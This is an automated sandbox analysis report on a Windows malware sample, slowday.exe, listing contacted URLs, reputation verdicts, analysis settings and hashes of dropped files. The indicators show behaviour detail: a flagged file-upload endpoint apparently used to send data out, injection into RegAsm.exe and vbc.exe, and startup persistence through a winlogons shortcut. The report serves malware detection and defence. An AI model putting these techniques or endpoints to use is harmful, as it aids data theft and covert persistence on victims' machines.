                                                                                                    https://contextual.media.net/48/nrrV18753.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                        high
                                                                                                        https://www.google.com/accounts/serviceloginvbc.exefalse
                                                                                                          high
                                                                                                          https://www.google.com/chrome/static/images/homepage/google-enterprise.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                            high
                                                                                                            https://www.google.com/chrome/static/images/homepage/google-dev.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/chrome/static/images/thank-you/thankyou-animation.jsonbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                high
                                                                                                                http://crl.pki.goog/gsr2/gsr2.crl0?bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://pki.goog/gsr2/GTSGIAG3.crt0)bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://www.google.com/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/chrome/static/images/fallback/icon-fb.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/chrome/static/images/mac-ico.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                      high
                                                                                                                      http://pki.goog/gsr2/GTS1O1.crt0#bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://pomf.cat/upload.php&https://a.pomf.cat/slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingthbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://www.google.com/chrome/static/images/google-play-download.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                        high
                                                                                                                        https://www.google.com/chrome/static/images/chrome_throbber_fast.gifbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                          high
                                                                                                                          https://www.google.com/chrome/static/images/homepage/google-canary.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngbhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                              high
                                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                                                high
                                                                                                                                https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/chrome/static/images/homepage/laptop_desktop.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/chrome/static/js/main.v2.min.jsbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                        high
                                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                                                          high
Name: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2b
Source: bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://login.yahoo.com/config/login
Source: vbc.exe
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://pomf.cat/upload.php
Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus Detection:
• 8%, Virustotal
• Avira URL Cloud: malware
Reputation: unknown

Name: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: bhvBB7.tmp.21.dr
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: http://bot.whatismyipaddress.com/
Source: RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: bhvAE74.tmp.6.dr
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: http://www.msn.com/de-ch/?ocid=iehp
Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr
Malicious: false
Reputation: high

Name: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr
Malicious: false
Antivirus Detection:
• URL Reputation: safe
Reputation: unknown

Name: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: bhvBB7.tmp.21.dr
Malicious: false
Reputation: high

Name: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr
Malicious: false
Reputation: high
Legend (share of contacted IPs per entry):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
IP: 192.168.2.1
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 614362
Start date and time: 23/04/2022 19:14:12 (2022-04-23 19:14:12 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 15s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: slowday.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@24/18@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 7.5% (good quality ratio 7.4%)
• Quality average: 80.5%
• Quality standard deviation: 21.6%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
19:15:14 | API Interceptor | 7x Sleep call for process: RegAsm.exe modified
19:15:15 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogons.url
No context
No context
No context
No context
No context
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 88
Entropy (8bit): 5.490292840056112
Encrypted: false
SSDEEP: 3:PFYyImXF9mN2RVQON4NgCkCAUdXM:PHRB6+C3xy
MD5: 454353131947D1483FF5470107478978
SHA1: C559163C23E5F878BE85D05F3EDEEAA620173C3D
SHA-256: 2DF94DC1C58E952A1EBD1AE1185A291A8A573982CA90EC1BBB87B81126002668
SHA-512: C8912DA4654C735F7618B0ABEA7EC0197B17E6E072718B825B5799B2E88CC0E8AE8245CA95E1E5955C3AB8F649CA4ED6529975B142B061ECC402D935401B84DE
Malicious: false
Preview: LeNF7Goy7uuKWKsmWAhDmhEi2BbZGy27JQQaO8wc/LiRcthbCBcu+4Nt6yYR3dz6dYTg/ZHS1axBPoq2xePo2w==
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x35b8f545, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
                                                                                                                                                                                    Size (bytes):26738688
                                                                                                                                                                                    Entropy (8bit):0.9895781249187471
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:3DdA2Ta0xucRfDw/GiD0Xko5QqbMgSFDb7uBi:1RfDz/y
                                                                                                                                                                                    MD5:A29FCFA1238DD40058924399606698C9
                                                                                                                                                                                    SHA1:113F267240602D5516B2972C04152FB4D451B05D
                                                                                                                                                                                    SHA-256:F32F052AAB7FFAF25E7F9265432B5CB2DB91D7520314AAE253363D23BCEC7D86
                                                                                                                                                                                    SHA-512:3761CF9764F60C9D8E19E5373687395C0C7B2AE37873A24252458B6E41AA34EECE887526555F593BA9EEF177CBE850CD54AE7EFE9E17870AE04592965F8481D6
                                                                                                                                                                                    Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9565967728175642
Encrypted:false
SSDEEP:24576:5GtA2Ta0xucRfDw/ZiD0Xko5QqbMgSFDb7uBi:ARfDM/y
MD5:D6AAAD36F7D6E3DE6ED37B9A4F6BD7E7
SHA1:A0775CE9569D571E9305AAE0592C0BE634B49C14
SHA-256:4D6578EDF445C1292D3ABFA6DC0D182239E20403EBA97B3B46326593F31DD11A
SHA-512:2CA3ADEF3643BD491605327C80E6F79E3D2B490B6B6D9C8E4F5C3B5BB4E424B09F0004FEABA9A7F85643C084F7385B8076DF66C3E857DD06FCA5453FF125742D
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9569452727553438
Encrypted:false
SSDEEP:24576:5LtA2Ta0xucRfDw/ZiD0Xko5QqbMgSFDb7uBi:/RfDM/y
MD5:3E484594120CF921845E093FA28D203E
SHA1:9330BE53E846459F2DB39B91DF261047A4C94042
SHA-256:D42DFE409DC2D00C82064DB537F05FBA4F8D14053BB334F623D552EA659A1315
SHA-512:E7A5F34D60DD45B2CF899AB4428026F8A5D3FF261F0FEEC64EFF55352BA96A6DF0979D199E64AE0C5D3FC02D95387796E4655723DD31CE47E68204AEA6D76F08
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x35b8f545, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9895781249187471
Encrypted:false
SSDEEP:24576:3DdA2Ta0xucRfDw/GiD0Xko5QqbMgSFDb7uBi:1RfDz/y
MD5:A29FCFA1238DD40058924399606698C9
SHA1:113F267240602D5516B2972C04152FB4D451B05D
SHA-256:F32F052AAB7FFAF25E7F9265432B5CB2DB91D7520314AAE253363D23BCEC7D86
SHA-512:3761CF9764F60C9D8E19E5373687395C0C7B2AE37873A24252458B6E41AA34EECE887526555F593BA9EEF177CBE850CD54AE7EFE9E17870AE04592965F8481D6
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9569452727553438
Encrypted:false
SSDEEP:
MD5:3E484594120CF921845E093FA28D203E
SHA1:9330BE53E846459F2DB39B91DF261047A4C94042
SHA-256:D42DFE409DC2D00C82064DB537F05FBA4F8D14053BB334F623D552EA659A1315
SHA-512:E7A5F34D60DD45B2CF899AB4428026F8A5D3FF261F0FEEC64EFF55352BA96A6DF0979D199E64AE0C5D3FC02D95387796E4655723DD31CE47E68204AEA6D76F08
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9c149ac1, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9658018377212408
Encrypted:false
SSDEEP:
MD5:A3DE8A8853138C76F5583A576E75DFFA
SHA1:0644DFDCFFAE7C52A12C2D285BBCB498638D456F
SHA-256:5A9D1B9DE28AE17A1B90FE500DF091517A4BA2DDB66CD2F82BE076A3B872E7B1
SHA-512:E5B08C680A1A79B02311E66C513FC4F9B8BDC3B3FDABA06053FBBC89ED5DE96E58B831BF6F4E80FBEBAAFF6DF2E3C7F592D6B0D350058C64FEE4FABC1ABF3509
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2dfa5ec5, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):26738688
Entropy (8bit):0.9895781282475702
Encrypted:false
SSDEEP:
MD5:47BD8351E5AEA2D90AC4C82BC2632289
SHA1:A0FEE3EFD2B3F93726A0DA36CA74211498211778
SHA-256:3864AE293CEE5140D689C2F6CAF0A04E1C0FCD48989C8FDCCD43AE3088A17D88
SHA-512:C63FA6E7C6B80736117AAC493ACF7942096BD4859C48744F42D643C9B9511EE9432CC548188B42BEF7CDCD482CDF782784CC5E699326C47CCD3A4EEAFB5E01E9
Malicious:false

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Little-endian UTF-16 Unicode text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Preview:..

Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Little-endian UTF-16 Unicode text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..
                                                                                                                                                                                    Process:C:\Users\user\Desktop\slowday.exe
                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\winlogons\winlogons.exe>), ASCII text, with CR line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):85
                                                                                                                                                                                    Entropy (8bit):4.808742554392863
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:AB33794F41AD76E56615A37D6622EA5C
                                                                                                                                                                                    SHA1:7B5EF2A89CE529D5571631A1A82B312CF8E190E7
                                                                                                                                                                                    SHA-256:B76FE7B226CAE1B013CFEF062E7CDD14B6E4DED9A1BC9200DDBC05535DA25FFD
